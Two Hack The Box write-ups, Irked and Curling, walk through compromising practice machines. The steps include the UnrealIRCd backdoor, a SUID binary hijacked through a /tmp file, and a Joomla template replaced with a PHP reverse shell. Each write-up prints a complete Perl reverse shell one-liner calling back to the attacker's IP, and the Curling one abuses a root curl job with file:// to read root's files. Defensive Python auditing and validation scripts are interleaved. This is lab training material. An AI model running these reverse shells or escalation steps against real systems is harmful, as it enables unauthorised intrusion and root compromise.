Hack The Box – Irked


1. Results of Nmap scan

As usual we start with an Nmap scan to find open ports on the target system. The best way to do so is to perform a SYN scan (half-open scan) on all ports without any version or script detection. Once we have the list of open ports we run a thorough scan on those ports with active version detection (-sV). As figure 1 shows, the target is offering an SSH service on port 22 and an HTTP server on port 80. Furthermore there is Remote Procedure Call (RPC) on port 111 and an IRC service on several high ports. Since the machine is named Irked we assume that the IRC service might be the entry point to a low-privileged shell on the box. But before taking a closer look at the IRC service we browse the web server on port 80.

2. Content of Webpage
3. List of exploits for UnrealIRCd

When we browse the web server we find an image in the root directory as shown in figure 2, but nothing else of interest. Since we already guessed that the goal might be to compromise the IRC service we take a look at the available exploits for UnrealIRCd as shown in figure 3. We see that there is a Metasploit module for backdoor command execution, which we try. Inside the Metasploit console we set RHOST to 10.10.10.117 and RPORT to 6697, which we know from the Nmap scan is one of the ports used by the target. When we run the exploit we are able to execute code on the target. Unfortunately the shell created by the Metasploit exploit gets terminated after a few seconds, which is why, as soon as Metasploit has created the initial shell, we start a second reverse shell that connects back on port 7777, as shown in figure 4.

4. Initial foothold on target system by using Metasploit


5. Password for steganography

On the target system we find a home directory for the user djmardov which contains the user flag and a hidden file called .backup. The backup file contains a password and a hint to use it in combination with steganography as shown in figure 5.

Wikipedia: “Steganography is the practice of concealing a file, message, image, or video within another file, message, image, or video.”

With the knowledge that the box might have something to do with steganography we take a step back, download the image we saw on the web server in figure 2 and take a closer look at it. We use a tool called Steghide to extract any hidden data from the image, supplying the password we found inside the .backup file. By doing so we receive the password for the user djmardov.

6. Hidden password inside the image from the web server.

The next step is to obtain root privileges on the target system. To do so we take a closer look at all binaries with the SUID bit set and try to find anything unusual. One binary called viewuser has no official man page. Furthermore, when we try to execute the binary our reverse shell stops working. So we copy the file to our local machine to inspect it further.

-rwsr-xr-x 1 root root 7328 May 16 2018 /usr/bin/viewuser

7. Binary viewuser executed locally.
8. Content of /tmp/listuser

When we execute the binary on our local machine we see the output shown in figure 7. The most interesting piece of information is that the program refers to a file called listusers inside the /tmp/ directory. We can use this to our advantage and try to execute arbitrary code by creating a file called listusers and placing it inside our local /tmp/ folder. We give the file a shebang line so that it is run by /bin/sh and let it execute a ping command, as shown in figure 8. Afterwards we execute the viewuser binary again and see that the ping command gets executed.

9. Viewuser executes code inside listuser file
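The weakness behind this escalation is a privileged binary that trusts a path any local user can write to. The following Python script, an added example rather than code from the write-up, audits a directory tree for SUID/SGID binaries whose embedded strings reference /tmp, /var/tmp or /dev/shm, which is the kind of finding a hardening review would want to surface before a box like this is shipped. The list of world-writable prefixes, the minimum string length and the constructed SAMPLE_BINARY bytes are assumptions for the example.

```python
import os
import re
import stat

# Paths a privileged program should never trust, because any local user can
# create files there. Extend this list for the audited host (assumption).
WORLD_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def extract_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return printable ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def find_writable_path_refs(data: bytes) -> list[str]:
    """Return embedded strings that reference a world-writable directory.

    A SUID binary carrying such a path very likely opens or executes a file
    that any local user can plant, which is exactly the viewuser problem.
    """
    return [
        s for s in extract_strings(data)
        if any(prefix in s for prefix in WORLD_WRITABLE_PREFIXES)
    ]


def is_setuid_or_setgid(path: str) -> bool:
    """True if the regular file has the SUID or SGID bit set (symlinks are not followed)."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & (stat.S_ISUID | stat.S_ISGID))


def audit_tree(root: str) -> dict[str, list[str]]:
    """Walk `root` and map each SUID/SGID binary to its suspicious path strings."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if not is_setuid_or_setgid(path):
                continue
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable binaries are skipped, not reported
            refs = find_writable_path_refs(data)
            if refs:
                findings[path] = refs
    return findings


# Constructed stand-in for a binary's contents: the kind of strings a program
# that shells out to a file in /tmp would carry. Not the real viewuser binary.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8
    + b"/bin/sh\x00" + b"-c\x00" + b"/tmp/listusers\x00"
    + b"This program fetches the user list\x00"
)


if __name__ == "__main__":
    print("suspicious strings in sample:", find_writable_path_refs(SAMPLE_BINARY))
    for path, refs in audit_tree("/usr/bin").items():
        print(f"{path}: {refs}")
```

Run it as root (or any user that can read the binaries) against /usr/bin, /usr/sbin and /usr/local; every hit deserves a look at whether the program actually opens that path, and the fix on the binary side is to keep helper files under a root-owned directory such as /usr/libexec rather than under /tmp.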

The next step is to go back to the target system and create a new file called listusers inside the /tmp/ directory containing the following reverse shell command:

perl -e 'use Socket;$i="10.10.13.183";$p=7778;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

When we execute the viewuser binary on the target system we receive a reverse connection with root privileges from the target back to our local system as shown in figure 10.

10. Root shell on HTB-Irked


Hack The Box – Curling

This box retired on 30.03.2019
Goal: CTF – user.txt & root.txt
Difficulty: 4.4 / 10 (rated by HTB-community)

We start with an Nmap scan to see which ports are open. The results show that the box is offering SSH on port 22 and hosting a web service on port 80.

1. Results of Nmap scan

When we browse the website we see multiple blog posts like the one shown in figure 2.

2. Blog post on Curling-website
3. Joomla-Login on /administrator/index.php

To gather more information about the web service we run Gobuster to enumerate directories. By doing so we identify a login page for the Joomla backend at "/administrator/index.php" as shown in figure 3. Since we cannot do much with the information gathered so far we need to find something else of interest. Because we know that the web server is running Joomla we can use a tool called Joomscan, a vulnerability scanner for Joomla. The scan points us to an interesting-looking directory, "http://10.10.10.150/administrator/modules", as shown in figure 4.

4. List of administrator modules

Looking through all listed modules we are not able to identify anything special or of interest. It seems like we took a wrong turn somewhere and landed in a rabbit hole. Because of this we take a step back and start all over again. We know that the machine is rated as easy by the community, so we might be overthinking it. While redoing the enumeration we take a closer look at the source code of the main page of the website and find an odd-looking comment, shown in figure 5.

5. Hidden comment in source code of Curling-Website.

When we browse to "/secret.txt" we find the following string:

Q3VybGluZzIwMTgh

We assume it's a password, go back to the administrator login page from figure 3 and try several usernames like admin, administrator and root, each with the string from secret.txt as the password. None of these logins succeed. We remember that we already found a potential username on the main website in the blog post shown in figure 2, which is why we try again with the username floris and the password Q3VybGluZzIwMTgh, but we still get no access.

It obviously has something to do with the secret.txt file, so we play around with the string. When decoding the string as base64 we get "Curling2018!", which is much more likely to be the correct password. /fail

Using Curling2018! and the username floris we get access to the administrator backend. The next step is to upload a PHP reverse shell so that we can execute commands on the system. To do so we look for an existing PHP page and replace its code with the code of a reverse shell. Figure 6 shows the default page error.php and part of the PHP reverse shell from pentestmonkey.net.

6. Replacing PHP-code of error.php site with PHP-code of a reverse shell.

After replacing the code inside the error.php file we browse to the directory it is located in to access and execute the malicious web shell.

http://10.10.10.150/templates/beez3/error.php

Figure 7 shows that we get a connection as www-data from the target host back to our system on port 9011.

7. Incoming connection from PHP reverse shell

The next step is to get a real shell. To do so we use the following Perl command to get a reverse connection from the host back to our system on port 9012:

perl -e 'use Socket;$i="10.0.13.55";$p=9012;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

When we take a look inside the home directory of user floris, we see that we need to escalate our privileges from user www-data to user floris to access the user flag as shown in figure 8.

8. Home directory of user floris

Inside the same directory we find an interesting-looking file called password_backup. Figure 9 shows the contents of that file, a hexdump that starts with the header "BZh91AY".

9. Content of password_backup file.

When we use Google to search for "hexdump BZh91AY" we find a tutorial on how to decode the contents of such a file. As figure 10 shows, we use the commands bzcat to decompress bzip2 data, zcat to decompress gzip data, and tar to unpack tar archives.

10. Decoding the password for user floris
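The bzcat/zcat/tar chain above is one instance of a general routine: look at the magic bytes, peel one container layer, repeat until plain content remains. The Python script below, an added example and not the author's commands, implements that general unwrapper with the standard library and adds the two guards a practitioner would want when decoding an untrusted blob: a cap on nesting depth and a cap on how far any single layer may inflate. The nested sample is constructed inside the script (payload in a tar, wrapped in gzip and bzip2 twice); it is not the password_backup file from the box.

```python
import bz2
import gzip
import io
import tarfile
from typing import Optional

# Magic bytes that identify each container layer.
BZIP2_MAGIC = b"BZh"
GZIP_MAGIC = b"\x1f\x8b"
TAR_MAGIC_OFFSET = 257           # the "ustar" magic sits at byte 257 of a tar header
TAR_MAGIC = b"ustar"

MAX_LAYERS = 16                  # stop on absurdly deep nesting
MAX_OUTPUT = 16 * 1024 * 1024    # refuse to inflate beyond 16 MiB per layer (decompression bomb guard)


def detect_layer(data: bytes) -> Optional[str]:
    """Name the outermost container of `data`, or None if it is plain content."""
    if data.startswith(BZIP2_MAGIC):
        return "bzip2"
    if data.startswith(GZIP_MAGIC):
        return "gzip"
    if data[TAR_MAGIC_OFFSET:TAR_MAGIC_OFFSET + len(TAR_MAGIC)] == TAR_MAGIC:
        return "tar"
    return None


def peel_one(data: bytes, kind: str) -> bytes:
    """Remove a single container layer of the given kind, bounded by MAX_OUTPUT."""
    if kind == "bzip2":
        out = bz2.BZ2Decompressor().decompress(data, max_length=MAX_OUTPUT)
    elif kind == "gzip":
        out = gzip.GzipFile(fileobj=io.BytesIO(data)).read(MAX_OUTPUT)
    elif kind == "tar":
        # Take the first regular member; the backup in the write-up holds a single file.
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tar:
            member = next(m for m in tar.getmembers() if m.isfile())
            if member.size > MAX_OUTPUT:
                raise ValueError("tar member too large")
            out = tar.extractfile(member).read()
    else:
        raise ValueError(f"unknown layer {kind}")
    if len(out) >= MAX_OUTPUT:
        raise ValueError("layer expands beyond the size limit")
    return out


def unwrap(data: bytes) -> tuple[bytes, list[str]]:
    """Strip container layers until plain content remains; return it and the layer order."""
    layers: list[str] = []
    for _ in range(MAX_LAYERS):
        kind = detect_layer(data)
        if kind is None:
            return data, layers
        layers.append(kind)
        data = peel_one(data, kind)
    raise ValueError("too many nested layers")


def build_sample(payload: bytes) -> bytes:
    """Constructed test input: payload -> tar -> gzip -> bzip2 -> gzip -> bzip2."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:") as tar:
        info = tarfile.TarInfo(name="password.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    data = buf.getvalue()
    for step in ("gzip", "bzip2", "gzip", "bzip2"):
        data = gzip.compress(data) if step == "gzip" else bz2.compress(data)
    return data


if __name__ == "__main__":
    sample = build_sample(b"constructed-sample-secret\n")
    content, layers = unwrap(sample)
    print("layers:", " -> ".join(layers))
    print("content:", content.decode())
```

To use it on a real file, read the bytes (after converting a hexdump back with xxd -r) and pass them to unwrap(); the returned layer list tells you which tools the manual chain would have needed and in which order.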

After we have obtained the password we are able to connect to the system with ssh as user floris and read the contents of the first flag inside the floris home directory.

Furthermore we are able to access the directory admin-area inside the home directory of user floris, which we already saw in figure 8. Inside the directory we find two files, input and report, to which we have read and write access, as shown in figure 11.

11. Content of admin-area directory

When we take a look inside the input file we see that it has the following content:

url = "http://127.0.0.1"

Inside the report file we find a copy of the source code of the Curling website that the box is hosting. It seems like the input file stores a parameter that is used as input for curl, which is executed as a scheduled task every minute. The result of the execution is then written into the report file.

To test our assumption we create a file, host it on our machine and try to access it by modifying the contents of the input file as shown in figure 12.

echo "Offensive IT" > test.txt

12. Manipulate content of input file to access locally hosted test file

As figure 12 shows we guessed right, and after one minute the report file contains the content of our previously created test.txt file.

Since we know that the curl command running in the background is executed with root privileges we try to access the root flag. To do so we adjust the parameter inside the input file so that curl will access files on the local system.

url = \"file:///root/root.txt\"

13. Access root flag with curl
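The root cause here is a privileged scheduled job that takes its target URL from a file a low-privileged user can edit, with no restriction on the URL scheme, so curl happily serves file:// reads. The Python wrapper below is an added example, not part of the write-up or the box, showing how such a job should validate the option before invoking curl: it parses the url line (unescaping the backslash-quoted form seen above), allows only http and https, checks the host against an allowlist, and passes curl's --proto option so that curl itself refuses other schemes as a second line of defence. The allowed host list, the config-line format and the two constructed config strings are assumptions for the example.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Only these schemes are acceptable for a scheduled fetch. file://, gopher://,
# dict:// and friends would let whoever edits the config read local files or
# talk to internal services with the privileges of the job.
ALLOWED_SCHEMES = {"http", "https"}
# Hosts the job is expected to contact (assumption for this example).
ALLOWED_HOSTS = {"127.0.0.1", "localhost"}

_LINE_RE = re.compile(r"^\s*url\s*=\s*(.+?)\s*$")


def parse_url_option(config_text: str) -> Optional[str]:
    """Extract the value of the `url = ...` option from a curl-config style file.

    Surrounding quotes are removed; backslash-escaped quotes (as in the
    write-up's input file) are unescaped first.
    """
    for line in config_text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        value = m.group(1).replace('\\"', '"')
        if len(value) >= 2 and value[0] == value[-1] and value[0] in "\"'":
            value = value[1:-1]
        return value
    return None


def url_is_allowed(url: str) -> tuple[bool, str]:
    """Return (allowed, reason) for a URL the privileged job is about to fetch."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme or '<none>'!r} is not permitted"
    if parts.hostname not in ALLOWED_HOSTS:
        return False, f"host {parts.hostname!r} is not in the allowlist"
    return True, "ok"


def build_curl_command(config_text: str, output_path: str) -> list[str]:
    """Validate the config and return the argv the job may run, or raise ValueError."""
    url = parse_url_option(config_text)
    if url is None:
        raise ValueError("no url option found")
    ok, reason = url_is_allowed(url)
    if not ok:
        raise ValueError(f"refusing to fetch {url!r}: {reason}")
    # --proto restricts curl itself to these schemes, independent of our check above.
    return ["curl", "--proto", "=http,https", "-o", output_path, "--", url]


# Constructed config contents: the benign original and the abusive variant.
BENIGN_CONFIG = 'url = "http://127.0.0.1"\n'
MALICIOUS_CONFIG = 'url = \\"file:///root/root.txt\\"\n'

if __name__ == "__main__":
    for cfg in (BENIGN_CONFIG, MALICIOUS_CONFIG):
        try:
            print(build_curl_command(cfg, "/tmp/report"))
        except ValueError as exc:
            print("blocked:", exc)
```

The other half of the fix is file ownership: the input file should not be writable by the account whose flag the job is supposed to protect, and the job should not run as root at all if a dedicated low-privileged user can do the fetch.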

Furthermore we are able to obtain the SSH private key for user root as shown in figure 14.

14. Private SSH key for root